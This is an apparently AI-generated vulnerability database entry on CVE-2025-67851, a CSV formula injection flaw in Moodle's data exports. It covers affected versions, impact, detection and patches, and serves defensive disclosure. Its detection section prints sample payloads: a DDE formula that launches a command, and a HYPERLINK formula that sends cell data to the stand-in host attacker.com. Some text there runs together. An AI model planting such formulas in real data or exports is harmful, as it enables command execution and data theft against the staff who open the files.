
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67851 is a formula injection vulnerability (CSV injection) in Moodle, the open-source learning management system. The flaw occurs when data fields are exported without proper escaping, allowing a remote attacker to embed malicious spreadsheet formulas in exported data that execute when the file is opened in a spreadsheet application. Affected versions include Moodle < 4.1.22, 4.4.0–4.4.11, 4.5.0–4.5.7, 5.0.0–5.0.3, and 5.1.0. It was disclosed on February 3, 2026, with a CVSS v3.1 base score of 6.1 (Moderate) per GitHub Advisory, or 7.8 (High) per an alternative scoring (Github Advisory, Red Hat Bugzilla).
The root cause is CWE-1236 (Improper Neutralization of Formula Elements in a CSV File): Moodle saves user-provided data into exported files (e.g., CSV/spreadsheet exports) without sanitizing characters such as =, +, -, or @ that spreadsheet applications interpret as formula initiators. An attacker with access to submit data fields (e.g., course data, user profile fields) can craft input containing malicious formula payloads. When an administrator or instructor exports this data and opens the resulting file in a spreadsheet application, the formula executes in the context of the victim's local machine. The attack vector is local (the spreadsheet must be opened), requires low privileges to inject data, and requires user interaction to trigger (Github Advisory, Red Hat Bugzilla). Patches are available in commits 29820c5, aa66bac, and dc57ccc in the moodle/moodle repository (Github Advisory).
Successful exploitation can lead to compromised data integrity and unintended operations within the spreadsheet application opened by the victim (typically an administrator or instructor). Depending on the spreadsheet application and its configuration, malicious formulas could exfiltrate data, execute system commands via DDE (Dynamic Data Exchange), or manipulate displayed values to deceive the user. Confidentiality impact is rated low to high depending on the scoring source, while integrity impact is rated high (Github Advisory, Red Hat Bugzilla).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-67851. The EPSS score is approximately 0.063–0.094%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an attacker to have at least low-level privileges to submit data in Moodle, and a privileged user (e.g., admin or teacher) must export and open the affected file in a spreadsheet application (Github Advisory).
=CMD|'/C calc'!A0 or =HYPERLINK("http://attacker.com/"&A1,"Click here") to exfiltrate data.=, +, -, or @ at the start of field values, particularly in profile fields, database activity entries, or assignment submissions.excel.exe, soffice.exe) to unexpected external hosts shortly after opening an exported Moodle file — may indicate formula-based data exfiltration.=, +, -, @, |, or % in user-supplied fields.cmd.exe, powershell.exe, bash) after opening a Moodle export file, which may indicate DDE-based command execution.Moodle has released patched versions addressing this vulnerability: 4.1.22, 4.4.12, 4.5.8, 5.0.4, and 5.1.1. Administrators should upgrade to one of these versions as the primary remediation. As a workaround prior to patching, administrators can restrict who can submit data to exportable fields, and users who open exported files should disable automatic formula execution in their spreadsheet applications (e.g., disable DDE in Microsoft Excel). The official Moodle security advisory is available on the Moodle forums (Moodle Advisory, Github Advisory).
The vulnerability was reported via Red Hat's OSIDB system and tracked in Red Hat Bugzilla, indicating coordination between the Moodle project and downstream distributors. The GitHub Advisory Database rated it as "Moderate" severity. No significant public researcher commentary, social media discussion, or major media coverage has been identified beyond standard vulnerability database entries (Red Hat Bugzilla, Github Advisory).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."